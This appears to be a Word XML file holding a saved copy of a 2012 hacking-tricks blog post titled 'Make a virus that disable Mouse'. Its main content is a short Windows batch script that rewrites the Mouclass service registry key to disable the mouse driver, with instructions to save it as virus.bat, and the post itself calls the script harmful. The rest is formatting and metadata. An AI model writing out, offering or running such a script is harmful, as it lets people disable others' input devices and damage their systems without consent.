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E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B1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1E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5B11E3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"http://coolhacking-tricks.blogspot.in/2012/01/make-virus-that-disable-mouse.html" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005B11E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5B11E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Make a virus that disable Mouse</w:t>
      </w:r>
      <w:r w:rsidRPr="005B11E3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5B11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B11E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B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04:48 Posted by </w:t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Akshay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  <w:t xml:space="preserve">Labels: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="005B11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BATCH PROGRAMMING</w:t>
        </w:r>
      </w:hyperlink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5B11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HACKING</w:t>
        </w:r>
      </w:hyperlink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81"/>
      </w:tblGrid>
      <w:tr w:rsidR="005B11E3" w:rsidRPr="005B11E3" w:rsidTr="005B1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1E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B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11E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B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11E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B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11E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B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11E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B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B11E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B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1E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B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383790"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="http://1.bp.blogspot.com/-kC6vekdgA80/TvxgJ47FhRI/AAAAAAAAAUk/c_F2oAIEQu8/s320/mouse-virus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C6vekdgA80/TvxgJ47FhRI/AAAAAAAAAUk/c_F2oAIEQu8/s320/mouse-virus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1E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B11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1E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B11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E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>               I had previously posted on making different</w:t>
      </w:r>
      <w:r w:rsidRPr="005B11E3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 batch files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like matrix effect, opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is </w:t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harmfull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it will </w:t>
      </w:r>
      <w:r w:rsidRPr="005B11E3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disable your mouse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so think before trying it on yourself.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="more"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="005B11E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B1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5B11E3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Notepad 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t>and copy below codes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B11E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B11E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11E3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Disable Mouse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  <w:t>set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"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delete %key%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add %key% /v Start /t REG_DWORD /d 4</w:t>
      </w:r>
      <w:r w:rsidRPr="005B11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11E3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 w:rsidRPr="005B11E3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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B11E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B1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E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Save this file as  </w:t>
      </w:r>
      <w:r w:rsidRPr="005B11E3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virus.bat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B11E3" w:rsidRPr="005B11E3" w:rsidRDefault="005B11E3" w:rsidP="005B1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1E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Done you just created your virus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D1609" w:rsidRDefault="004D1609"/>
    <w:sectPr w:rsidR="004D1609" w:rsidSect="004D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29D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6C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07FE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CC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B11E3"/>
    <w:rsid w:val="004D1609"/>
    <w:rsid w:val="005B11E3"/>
    <w:rsid w:val="00E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09"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005B1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1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11E3"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-author">
    <w:name w:val="post-author"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005B11E3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fn">
    <w:name w:val="fn"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005B11E3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-labels">
    <w:name w:val="post-labels"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005B11E3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ilad">
    <w:name w:val="il_ad"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005B11E3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005B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.bp.blogspot.com/-kC6vekdgA80/TvxgJ47FhRI/AAAAAAAAAUk/c_F2oAIEQu8/s1600/mouse-virus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hacking-tricks.blogspot.in/search/label/HACKING" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://coolhacking-tricks.blogspot.in/search/label/BATCH%20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>BASTARDS TeaM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</dc:creator>
  <cp:lastModifiedBy>Sjp</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-11-12T12:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-11-12T12:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>